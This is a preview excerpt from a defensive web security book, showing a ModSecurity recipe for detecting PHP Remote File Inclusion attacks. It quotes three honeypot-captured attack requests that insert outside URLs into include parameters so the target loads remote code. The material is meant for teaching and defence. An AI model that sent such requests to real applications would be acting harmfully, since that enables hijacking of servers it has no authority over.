December 2012
Intermediate to advanced
552 pages
13h 16m
English
Content preview from Web Application Defender's CookbookBecome an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
Start your free trial
Recipe 9-5: Preventing Remote File Inclusion (RFI) Attacks
This recipe shows you how to identify when attackers attempt to force the application to execute code from a remote site.
Ingredients
- OWASP ModSecurity Core Rule Set (CRS)
- modsecurity_crs_40_generic_attacks.conf
- ModSecurity
- REQUEST_URI variable
- REQUEST_BODY variable
- REQUEST_HEADERS variable
- XML variable
- @rx operator
- @beginsWith operator
CAPEC-193: PHP Remote File Inclusion
In this pattern the attacker is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized “include” or “require” call, which the user can then control to point to any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions.
Sample Attacks
These attack examples were gathered from web honeypot sensors:
GET /videodb.class.xml.php?mosConfig_absolute_path=http://195.225.59
.42/a/l2.jpg?? HTTP/1.1
GET /shop/admin/includes/auth.inc.php?=http://damocom.net/bbs/data/
voip/link1.txt?? HTTP/1.1
GET /include/print_category.php?setup[use_category]=1&dir=http://
kesi.granc.hu/html/e107_images/clan/flags/banner.jpg??? HTTP/1.1Blocking RFI Attacks
The following examples are taken from the OWASP ModSecurity CRS modsecurity_crs_40_generic_attacks.conf file.
RFI Detection Challenges
When trying to use ...